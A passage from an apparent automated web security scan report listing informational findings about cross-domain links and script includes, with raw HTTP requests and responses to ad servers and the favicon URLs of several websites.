Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:53:54 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12514

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/cwe-79-xss-dork-www.ovh.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DEarnMyDegree.com/Art%2526amp%253BDesign%26adT%3DCreative%2BWriting%2BPrograms%26adU%3Dwww.intacct.com/AccountingSoftware%26adT%3DAccounting%2BSolutions%26adU%3Ddegree-online.NECB.edu%26adT%3DBusiness%2BDegree%2BOnline%26gl%3DUS&amp;usg=AFQjCNE-5W91cwD_d2YaBnCFXVqxic7x2Q" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
19.42. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-xss-cross-site-scripting-dork-example-poc.html&dt=1301749091012&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749091023&frm=0&adk=1607234649&ga_vid=100666562.1301749091&ga_sid=1301749091&ga_hid=1244546770&ga_fc=0&u_tz=-300&u_his=25&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=PbvtqD9hJU&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:57:35 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4688

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CL3YltbNzsrb1QEQ2AUYWjIIFpzmYEJETKg">
...[SNIP]...
APcBfUDAAAAxA%26num%3D1%26sig%3DAGiWqtyyGLVJePvP2aUc73kP8LJSTHLxjA%26client%3Dca-pub-4063878933780912%26adurl%3Dhttp://lovealocalbusiness.intuit.com/fan%253Fcid%253Dsoc_gg_lalb__fan%2526vtid%253Dgsem"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CL3YltbNzsrb1QEQ2AUYWjIIFpzmYEJETKg" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBu6tdPh2XTeLpMouBlgf52eSUCd7theEBjp-7zhGWk9-WScDnmQEQARgBIL7O5Q04AFD-ueqD-P____8BYMkGoAHu8sn5A7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBBNoBU2h0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni14c3MtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZG9yay1leGFtcGxlLXBvYy5odG1sgAIBuAIYwAIFyALu5LYUqAMB6AML6AMF6APcBfUDAAAAxA%26num%3D1%26sig%3DAGiWqtyyGLVJePvP2aUc73kP8LJSTHLxjA%26client%3Dca-pub-4063878933780912%26adurl%3Dhttp://lovealocalbusiness.intuit.com/fan%253Fcid%253Dsoc_gg_lalb__fan%2526vtid%253Dgsem" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/capec-86-xss-cross-site-scripting-dork-example-poc.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DLoveALocalBusiness.Intuit.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGIC15NtbOfVYFN1sRg7WeKtvL4Qg" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
19.43. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998823&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcwe-79-cross-site-scripting.www.norwich.edu.html&dt=1301748286996&bpp=7&shv=r20110324&jsv=r20110321-2&correlator=1301748287035&frm=0&adk=1607234649&ga_vid=466867705.1301748287&ga_sid=1301748287&ga_hid=1424854655&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=982&bih=1004&fu=0&ifi=1&dtd=124&xpc=dzY5B8mbRX&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:44:11 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12143

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/cwe-79-cross-site-scripting.www.norwich.edu.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DAPC.com/DataCenterUniversity%26adT%3DServer%2BInstallation%26adU%3Dwww.Datapipe.com%26adT%3DNeed%2Ba%2BVirtualized%2BServer%26adU%3Dwww.Supermicro.com%26adT%3D6-Core%2B4-Way%2BSuperServers%26gl%3DUS&amp;usg=AFQjCNHCytgDL5YW50Pj1t3CWkebMZVVVw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
20. Cross-domain script include  previous  next
There are 48 instances of this issue:

20.1. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=;ord=879784873? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7149
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 02 Apr 2011 12:56:48 GMT
Expires: Sat, 02 Apr 2011 12:56:48 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Jan 06 11:17:25 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
20.2. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /activityi;src=2178764;type=newkc987;cat=kcomh345;ord=1;num=2714251752477.139? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; BE_CLA=p_id%3D2L8PRN68LAAPR28ANNL404NJ22AH628422%26p_last_ref%3Dhttp%253A//quickbooksonline.intuit.com/bookkeeping-accounting-systems/%253Fsc%253DQBC-V51-SUF-HMEPGE%26s_entry%3Dhttp%253A//fls.doubleclick.net/activityi%253Bsrc%253D1996823%253Btype%253Dfmsco864%253Bcat%253Dqbosi086%253Bord%253D1%253Bnum%253D7793246807996.184%253F%26p_first_ref%3Dhttp%253A//quickbooksonline.intuit.com/bookkeeping-accounting-systems/%253Fsc%253DQBC-V51-SUF-HMEPGE%26p_first_entry%3Dhttp%253A//fls.doubleclick.net/activityi%253Bsrc%253D1996823%253Btype%253Dfmsco864%253Bcat%253Dqbosi086%253Bord%253D1%253Bnum%253D7793246807996.184%253F%26s_expire%3D1300726794236%26s_id%3DJL8PRN68LAAPRJP844P404NJ22AH628422; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sat, 02 Apr 2011 13:57:06 GMT
Expires: Sat, 02 Apr 2011 13:57:06 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 1088

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- Start of Standa
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
20.3. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301766285&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcwe-79-cross-site-scripting.www.norwich.edu.html&dt=1301748285145&bpp=5&shv=r20110324&jsv=r20110321-2&correlator=1301748285207&frm=0&adk=1607234649&ga_vid=1031013934.1301748285&ga_sid=1301748285&ga_hid=1004053173&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=982&bih=1004&fu=0&ifi=1&dtd=94&xpc=4iHGLQIcCW&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:44:10 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4656

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
20.4. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-xss-dork-cwe79-imp.fetchback.com.html&dt=1301749134308&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749134321&frm=0&adk=1607234649&ga_vid=1705879164.1301749134&ga_sid=1301749134&ga_hid=930736349&ga_fc=0&u_tz=-300&u_his=29&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&eid=33895132&fu=0&ifi=1&dtd=18&xpc=OPFNo6cnem&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:58:18 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 13559

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
20.5. http://www.411.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.411.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.411.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Vary: Accept-Encoding
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 13:42:01 GMT
Status: 200 OK
X-Runtime: 0.02831
ETag: "28868ff376e29e9093907243f62f8121"
Connection: keep-alive
Set-Cookie: wp_endemic_provider=A; domain=.411.com; path=/; expires=Sun, 03 Apr 2011 01:42:01 GMT
Set-Cookie: wp_perm=pid%3D_LLdoF0uEeCxcgAeC-lzfg; domain=.411.com; path=/; expires=Sun, 01 Apr 2012 13:42:01 GMT
Set-Cookie: wp_qc_demo_at=gn%3D%2Cage%3D%2Cchh%3D%2Cedu%3D%2Chh%3D%2Cqn%3D; domain=.411.com; path=/; expires=Sun, 01 Apr 2012 13:42:01 GMT
Set-Cookie: _wpn_sid=7494deac6a51f7c62e310ec573d0b582; domain=.411.com; path=/
Content-Length: 16254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equi
...[SNIP]...
</script>


<script src="http://js.revsci.net/gateway/gw.js?csid=A06546" type="text/javascript"></script>
...[SNIP]...
20.6. http://www.800notes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.800notes.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.800notes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 13:57:37 GMT
Content-Length: 2068

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Access Denied</title><meta name="SKYPE_TOOLBAR" content="SKY
...[SNIP]...
<link rel="shortcut icon" href="http://r.octonet.com/favicon.ico" /><script type="text/javascript" src="http://r.octonet.com/sys/oos-js.ashx/1.2/en-US.js"></script>
...[SNIP]...
20.7. http://www.androidcentral.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.androidcentral.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.androidcentral.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: spe
Date: Sat, 02 Apr 2011 14:06:31 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Set-Cookie: SESSff98d42578ac6106ce5b7f80c23f307a=hr1onak19pbmm2diiqpgglrca2; expires=Mon, 25-Apr-2011 17:39:51 GMT; path=/; domain=.androidcentral.com
Last-Modified: Sat, 02 Apr 2011 14:00:10 GMT
ETag: "acfc4415a958e438545290ed1f077f57"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Length: 367789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Home |
...[SNIP]...
<div class="content">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</noscript>
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://track.netshelter.net/js/sites/androidcentral.com.js"></script>
...[SNIP]...
20.8. http://www.biglots.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.biglots.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.biglots.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:33:57 GMT
Server: Apache/2.2.17 (Win32) mod_ssl/2.2.15 OpenSSL/0.9.8o mod_jk/1.2.31
Set-Cookie: JSESSIONID=9EE15E1A14FD5B47D59D04701296C03D.108prd3; Path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=utf-8
Content-Length: 30138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- layouts/mai
...[SNIP]...
<![endif]-->
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
20.9. http://www.bizjournals.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizjournals.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bizjournals.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:39:04 GMT
Server: Apache
Set-Cookie: bizj=YToxOntzOjM6IlVJTiI7czozMDoiMjkxNTE2MTg0MzRkOTcyNmY4Y2Y3Njg3MGZlZjhjIjt9%7C1301751544%7C6cb798d646d7838561076324272978f8ff136b64cfb9b8dd5c0d4c55c0436ed1; expires=Sun, 01-Apr-2012 13:39:04 GMT; path=/; domain=.bizjournals.com
